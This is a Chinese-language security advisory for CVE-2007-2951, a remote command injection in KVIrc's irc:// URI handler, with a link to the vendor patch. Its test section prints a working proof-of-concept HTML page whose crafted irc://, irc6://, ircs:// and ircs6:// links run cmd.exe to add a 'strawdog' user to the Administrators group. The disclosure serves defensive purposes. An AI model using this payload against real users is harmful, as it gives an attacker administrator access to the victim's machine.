KVIrc irc:// URI处理器远程命令注入漏洞
发布日期:2007-06-26
更新日期:2007-06-28
受影响系统:KVIrc KVIrc 3.2.5
KVIrc KVIrc 3.2
描述:
BUGTRAQ ID:
24652,
32410
CVE(CAN) ID:
CVE-2007-2951
KVIrc是一款免费的可移植IRC客户端。
KVIrc客户端在处理“irc://”协议串时存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行命令。
KVIrc客户端的src/kvirc/kernel/kvi_ircurl.cpp文件中的parseIrcUrl()函数在为KVIrc的内部脚本系统构建命令时没有正确过滤部分URI,如果用户受骗打开了特制的irc://或类似的URI(如irc6://)的话,就会导致注入并执行KVIrc脚本系统命令。成功攻击要求KVIrc是irc://或类似URI的默认处理器。
<*来源:Stefan Cornelius
链接:
http://secunia.com/secunia_research/2007-56/advisory/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<body>
<a href='irc:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20 \
pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>Heaven \
and Earth are impartial</a><br>
<a href='irc6:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%2 \
0pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They see \
the ten thousand things as straw dogs</a><br>
<a href='ircs:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%2 \
0pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>The wise \
are impartial</a><br>
<a href='ircs6:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog% \
20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They \
see the people as straw dogs</a><br>
</body>
</html>
建议:
厂商补丁:
KVIrc
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://svn.kvirc.de/kvirc/changeset/630/#file3浏览次数:2503
严重程度:0(网友投票)
